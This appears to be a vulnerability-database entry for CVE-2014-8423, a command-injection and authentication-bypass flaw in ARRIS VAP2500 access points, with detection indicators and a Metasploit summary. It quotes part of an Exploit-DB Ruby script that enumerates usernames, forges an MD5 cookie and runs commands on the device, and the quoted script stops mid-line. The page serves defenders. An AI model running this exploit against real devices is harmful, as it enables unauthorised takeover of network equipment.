CVE-2014-8423
published 2014-11-28CVE-2014-8423: Unspecified vulnerability in the management portal in ARRIS VAP2500 before FW08.41 allows remote attackers to execute arbitrary commands via unknown vectors.
PriorityP180critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
62.48%
99.1th percentile
Unspecified vulnerability in the management portal in ARRIS VAP2500 before FW08.41 allows remote attackers to execute arbitrary commands via unknown vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arris | vap2500_firmware | <= 08.41 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated GET requests to /admin.conf, which leaks valid usernames from the device management portal. ↗
- →Detect POST requests to /tools_command.php with a Cookie header of the form 'p=<32-char hex string>' (MD5 of username) — this is the authentication bypass mechanism. ↗
- →Alert on POST body parameters containing 'txt_command=' sent to /tools_command.php, indicating OS command injection attempts. ↗
- →Monitor for telnet being re-enabled on the device: look for POST to /tools_command.php with body containing 'telnet-disabled' or 'S42inetd'. ↗
- ·The authentication bypass only works if at least one valid username exists on the device; the exploit enumerates usernames from /admin.conf before attempting command execution. ↗
- ·The vulnerability affects ARRIS VAP2500 devices running firmware versions prior to FW08.41; patched devices should not be exploitable via this vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Arris VAP2500 - Authentication Bypass
exploitdb·2014-11-25
CVE-2014-8425 Arris VAP2500 - Authentication Bypass
Arris VAP2500 - Authentication Bypass
---
#!/usr/bin/env ruby
require 'net/http'
require 'digest/md5'
if !ARGV[0]
puts "Usage: #{$0} "
exit(0)
end
host = ARGV[0]
new_pass = "h4x0r3d!"
http = Net::HTTP.new(host).start
users = nil
users = http.request_get("/admin.conf").body.split("\n").map! {|user| user.sub(/^(.*?),.*$/,"\\1")}
if users
puts "[*] found user accounts: #{users.inspect}"
puts "[*] checking for root privs"
else
puts "[!!!] could not find any user accounts. exiting."
exit(-1)
end
root_privs = nil
users.each {|user|
if http.request_post("/tools_command.php","cmb_header=&txt_command=whoami",{"Cookie" => "p=#{Digest::MD5.hexdigest(user)}"}).body =~ /root/
puts "[*] root privs found: #{user}"
root_privs = user
break
end
}
if !root_privs
puts "[!!!] could not find a root pri
Metasploit
Arris VAP2500 tools_command.php Command Execution
metasploit
Arris VAP2500 tools_command.php Command Execution
Arris VAP2500 tools_command.php Command Execution
Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username.
No writeups or analysis indexed.
2014-11-28
Published